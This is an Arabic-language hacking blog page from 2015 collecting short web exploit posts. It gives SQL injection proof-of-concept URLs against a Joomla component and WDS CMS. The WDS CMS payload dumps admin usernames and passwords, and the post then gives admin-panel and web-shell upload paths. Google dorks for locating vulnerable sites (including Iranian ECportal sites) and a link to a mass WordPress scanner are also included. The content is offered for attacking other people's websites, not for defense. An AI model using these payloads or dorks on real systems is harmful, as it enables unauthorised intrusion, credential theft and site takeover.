السبت، 22 أغسطس 2015

Joomla com_informations - SQL Injection

Joomla com_informations - SQL Injection 

2. Proof of Concept
  
http://[target]/index.php?option=com_informations&view=sousthemes&themeid=-3 (SQLI)
  
Injected column is # 3
  
http://[target]//index.php?option=com_informations&view=sousthemes&themeid=999.9+union+select+111,222,version()%23
  

ECportal ثغرة تحميل على مواقع

ثغرة تحميل على مواقع 
ECportal File Upload 

# Software Link: http://nomra.ir/
# Version: 3.0
# Tested on: Windows 7 / Kali Linux
# Category: WebApps

DORK:
intext:site:ir "Powered by ECportal"
POC:




اختراق - WDS CMS - SQLI

اختراق - WDS CMS - SQLI 

# Exploit Title : WDS CMS - SQL Injection
# Google Dork : allinurl:wds_news/article.php?ID=

Exploit : http://[Target]/wds_news/article.php?ID=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+cms_admin--
 
Control Panel : http://[Target]/wds_news/admin/login.php
 
Upload Shell : http://[Target]/wds_news/admin.php?mode=list_file
 
Shell Path :  http://[Target]/wds_news/filer/shell.php


حافظ على سريتك من التجسس وينداوز 10

حافظ على سريتك من التجسس وينداوز 10 


Inurlbr فحص الوردبريس بالكثلة بواسطة

فحص الوردبريس بالكثلة بواسطة 
Mass Wpscan + Inurlbr 


#scanner:
 https://github.com/googleinurl/SCANNER-INURLBR